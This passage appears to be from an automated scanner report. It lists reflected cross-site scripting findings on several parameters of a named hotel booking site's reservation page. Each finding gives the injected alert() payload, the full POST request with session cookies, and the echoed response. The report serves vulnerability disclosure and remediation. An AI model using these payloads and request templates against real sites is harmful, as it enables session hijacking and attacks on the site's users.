Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=74d76d--><img%20src%3da%20onerror%3dalert(1)>602f13b20c8&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&ch
...[SNIP]...

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:33:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
10/74d76d--><img src=a onerror=alert(1)>602f13b20c8/2011 is an invalid date or time string. <br>
...[SNIP]...
4.290. https://www.hotelplanner.com/Accept/Reserve.cfm [departureMonth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the departureMonth request parameter is copied into an HTML comment. The payload 9f93b--><img%20src%3da%20onerror%3dalert(1)>0bcce531657 was submitted in the departureMonth parameter. This input was echoed as 9f93b--><img src=a onerror=alert(1)>0bcce531657 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=99f93b--><img%20src%3da%20onerror%3dalert(1)>0bcce531657&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateT
...[SNIP]...

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:33:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
The value 99f93b--><img src=a onerror=alert(1)>0bcce531657 cannot be converted to a number. <br>
...[SNIP]...
4.291. https://www.hotelplanner.com/Accept/Reserve.cfm [departureYear parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the departureYear request parameter is copied into an HTML comment. The payload 5b1cb--><img%20src%3da%20onerror%3dalert(1)>a97efa02bef was submitted in the departureYear parameter. This input was echoed as 5b1cb--><img src=a onerror=alert(1)>a97efa02bef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=20115b1cb--><img%20src%3da%20onerror%3dalert(1)>a97efa02bef&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&display
...[SNIP]...

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:33:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
10/7/20115b1cb--><img src=a onerror=alert(1)>a97efa02bef is an invalid date or time string. <br>
...[SNIP]...
4.292. https://www.hotelplanner.com/Accept/Reserve.cfm [depositRequired parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the depositRequired request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e59d3"><script>alert(1)</script>79153e46eb0 was submitted in the depositRequired parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
ghtlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequired=truee59d3"><script>alert(1)</script>79153e46eb0&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+Kin
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:35 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="depositRequired" value="truee59d3"><script>alert(1)</script>79153e46eb0">
...[SNIP]...
4.293. https://www.hotelplanner.com/Accept/Reserve.cfm [displayCurrencyCode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the displayCurrencyCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac706"><script>alert(1)</script>3aca14f8883 was submitted in the displayCurrencyCode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
geableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USDac706"><script>alert(1)</script>3aca14f8883&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescriptio
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:13 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="displayCurrencyCode" value="USDac706"><script>alert(1)</script>3aca14f8883">
...[SNIP]...
4.294. https://www.hotelplanner.com/Accept/Reserve.cfm [displayRoomRate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the displayRoomRate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6daa4"><script>alert(1)</script>ff05d5905e4 was submitted in the displayRoomRate parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.26daa4"><script>alert(1)</script>ff05d5905e4&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequ
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:02 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58861

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="displayRoomRate" value="1434.26daa4"><script>alert(1)</script>ff05d5905e4">
...[SNIP]...
4.295. https://www.hotelplanner.com/Accept/Reserve.cfm [extraPersonFees parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the extraPersonFees request parameter is copied into an HTML comment. The payload 31a57--><img%20src%3da%20onerror%3dalert(1)>ded68a36227 was submitted in the extraPersonFees parameter. This input was echoed as 31a57--><img src=a onerror=alert(1)>ded68a36227 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=31a57--><img%20src%3da%20onerror%3dalert(1)>ded68a36227&chargeableRoomRateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCod
...[SNIP]...

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:34:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
The value 31a57--><img src=a onerror=alert(1)>ded68a36227 cannot be converted to a number. <br>
...[SNIP]...
4.296. https://www.hotelplanner.com/Accept/Reserve.cfm [guaranteeRequired parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the guaranteeRequired request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cdc4"><script>alert(1)</script>9e0c0b1755e was submitted in the guaranteeRequired parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false4cdc4"><script>alert(1)</script>9e0c0b1755e&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuot
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:41 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="guaranteeRequired" value="false4cdc4"><script>alert(1)</script>9e0c0b1755e">
...[SNIP]...
4.297. https://www.hotelplanner.com/Accept/Reserve.cfm [hotelID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the hotelID request parameter is copied into an HTML comment. The payload d8c46--><img%20src%3da%20onerror%3dalert(1)>07b9aa2c06b was submitted in the hotelID parameter. This input was echoed as d8c46--><img src=a onerror=alert(1)>07b9aa2c06b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
